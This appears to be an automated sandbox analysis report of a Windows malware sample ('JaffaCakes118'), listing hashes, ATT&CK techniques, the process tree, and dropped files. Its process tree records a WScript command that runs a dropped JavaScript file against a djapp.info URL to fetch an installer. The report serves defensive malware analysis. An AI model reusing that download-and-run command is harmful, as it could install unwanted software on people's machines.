8ea56ca2636b05382e88190f465c70774d3b4cf481a7a93b4a6bcd8b0b86caf8

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
16-05-2024 02:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe
Size

184KB
MD5

492396d3aac1454a33cc6f1379d2c8b4
SHA1

9117468bfb9ae659995d572da45f9bccb5d903d4
SHA256

8ea56ca2636b05382e88190f465c70774d3b4cf481a7a93b4a6bcd8b0b86caf8
SHA512

e058257dab88bea39e1aac611bc6b60c4395b12180d3c1f69c8dab862d753ea79715f5d3b254809f158f7b317d8f4e16dd0f9dfe1b128a0c98cebbc0366ebf2b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+:/7BSH8zUB+nGESaaRvoB7FJNndnj

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2084	WScript.exe
8	2084	WScript.exe
10	2084	WScript.exe
12	2548	WScript.exe
13	2548	WScript.exe
15	1732	WScript.exe
16	1732	WScript.exe
18	1552	WScript.exe
19	1552	WScript.exe
21	2900	WScript.exe
22	2900	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2808	2756	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 2084	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	28
PID 2756 wrote to memory of 2084	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	28
PID 2756 wrote to memory of 2084	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	28
PID 2756 wrote to memory of 2084	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	28
PID 2756 wrote to memory of 2548	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	30
PID 2756 wrote to memory of 2548	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	30
PID 2756 wrote to memory of 2548	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	30
PID 2756 wrote to memory of 2548	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	30
PID 2756 wrote to memory of 1732	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	32
PID 2756 wrote to memory of 1732	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	32
PID 2756 wrote to memory of 1732	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	32
PID 2756 wrote to memory of 1732	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	32
PID 2756 wrote to memory of 1552	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	34
PID 2756 wrote to memory of 1552	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	34
PID 2756 wrote to memory of 1552	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	34
PID 2756 wrote to memory of 1552	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	34
PID 2756 wrote to memory of 2900	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	36
PID 2756 wrote to memory of 2900	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	36
PID 2756 wrote to memory of 2900	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	36
PID 2756 wrote to memory of 2900	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	36
PID 2756 wrote to memory of 2808	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	38
PID 2756 wrote to memory of 2808	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	38
PID 2756 wrote to memory of 2808	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	38
PID 2756 wrote to memory of 2808	2756	492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\492396d3aac1454a33cc6f1379d2c8b4_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf273F.js" http://www.djapp.info/?domain=FqAIGcdOrQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf273F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf273F.js" http://www.djapp.info/?domain=FqAIGcdOrQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf273F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2548
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf273F.js" http://www.djapp.info/?domain=FqAIGcdOrQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf273F.exe
  2⤵
  - Blocklisted process makes network request
  PID:1732
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf273F.js" http://www.djapp.info/?domain=FqAIGcdOrQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf273F.exe
  2⤵
  - Blocklisted process makes network request
  PID:1552
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf273F.js" http://www.djapp.info/?domain=FqAIGcdOrQ.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf273F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2900
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 568
  2⤵
  - Program crash
  PID:2808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
32e84a8ac91a222e92faf4fb8bd7c62f

SHA1
79a50468dcb323c6e717801bd28ed6b92b715d78

SHA256
a9e7be8b876ac51708762297ea4662ef00393dfd7cd2dabd2c86ca8f4bd4a877

SHA512
bb0506e166f33a630abb0acb1ab6f793725b625eee44dda07815544a6082d5d26038b9783c2ddbc4cebb738abdc8cc71af02dce8b75f172930bc51f2fa2dfa6c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
376f5cfeb22a05a1b4a7b5132500e2a4

SHA1
711e91c1d73f420687b37dc3588459bc14cd3ba4

SHA256
ecfe8a734d154bc1a434a1abc0e9e6d38e588c57c555ec9097ad8185df34cf88

SHA512
39c9f498a635cc2c6164796dd643d3249f94b6ebf27025bcdde3b275c001803d9f7ce1b43e85e1f7c683d0295040df02f2ef43ce037a461d041314d73ba3f082

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6bd213b7ac723da2a71827d070a2e764

SHA1
0776efc67a1f969fbfe9f66cc058c16019623d15

SHA256
390120a6b9681aeffd8109d430a67cc8a6122494b5e38a7a7057b323c13dac6c

SHA512
619a0b9d65529c7cb59ee6a92595665183d490413f1a3d8353888354ee5f936c253834a7f022a2d920423eba97d4b28ee7c65b4bf4f4d448aa394c1239224500

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
f03dc066080f2a879969245202bf9275

SHA1
e1487a84feac541240759af979cf5732149b5b80

SHA256
42d278727cee81c1b5423c46c7cac85f71d352ae7e905f95a423feed4eabb70b

SHA512
ff92656e96efa87e30a39d1883cefd8829ee94c2434c4fcb6b56ab5b7097df60ef72a6f936e01685db8ea45d42aa907cb46b3f37d21cfb6bfba2d09ee6847f67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
6KB

MD5
b8617f6b7a35a42a34ef853874ad3ec2

SHA1
f2a00cd82edaf172bad442dd340534f13a3b3d7b

SHA256
f271e50de3e2d4ef2df85e24e6b1c02fabb81780a7f99ba33f2abfd4c1a40ebe

SHA512
f48bbe93ba243694662a40ed42d53b461b45582dc9348cb269f1edbd66cfe6274a6fc1949a3d22a751820cb0f286e45e05bab1f6917db9ed5f8af8f74aafc22d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
6KB

MD5
8953d5469f7600c18440dda58c2ead5b

SHA1
311f387ff5dd4ca25862dc8b010d8e626e025be8

SHA256
fe63d8dbfd5364f35a93689f837f9d3b7b8e27067553e02d97d3aac7aacea8cc

SHA512
7e74de8b0912ca5ce1e747a0e48ef513f1170692c6f52c2fd7250d0f03e1f5f9b6a421c9dbdf692a575e41bfa72823311eecfe86bc1e7fdc064f409607cfa249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
6KB

MD5
8dc88617f4329fb9fbc426313a0fe14c

SHA1
a91d72018f14c67c1883619980c40f89efae1daf

SHA256
1c72f458a0a7642dc3f116ee6984a1bdf289e266969bee5677967b18d908dfe3

SHA512
ba6d4711eb21f0914a21ea02399c40fcb8900b8540ee762d826705ec09ae454f63f25b767db4a50d33c459693b57e538d5b656ede4f31133379c2d36b6f5b945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
6KB

MD5
90df8746ea2ac37e97a179cc01d222e9

SHA1
980e6f7d028e5b68064a5f48a0f71fd0bc8eb135

SHA256
02e5b69c507631128c6d0fa9233b93e6a94db02be270a9dd0b4aa4539d37762e

SHA512
031854fe55324502a508510c05214cc2b447571b4c3772ee677dd7978a30f062828838397b5a99d18bea93ed6ef77b3d76f317e73022ea5cdef4d3a81a54ad8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
6KB

MD5
0878facc6ff58a7f391cdb73ae12198b

SHA1
6c3e708001eb256fdff62a1e117cc6710be8b4c7

SHA256
9aa0458c86bc8ec7b4b93395816821445fe728a309040e1b3a055a872276b8d2

SHA512
d951ec04665c1e016c5b91367bf2a8cb6123ac1d28cf45edd02cac74f783d6ac44d348ff2493427098ee2ae4dbd263f2289816dd8a45438661b77cc04f2d6d78

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab563B.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6EBB.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf273F.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8XVVZ1SF.txt

Filesize
175B

MD5
fc6d66507f4094577f58c8756e30d903

SHA1
11dd8984666b1dfd91697e39e10eb11515398751

SHA256
de616c506c4cd4aa5d62918c45e2449956f03bafbb64ab66a46169d8c8ba756c

SHA512
0376d0191713380e20d3f507f42abcb38f5810e8aec2dd97548b85a9ba111dfdcdef04ce50e97913eed22e0ac2cc68d68198c4414117e4aa8b858e7012fbe7e0

Download Submit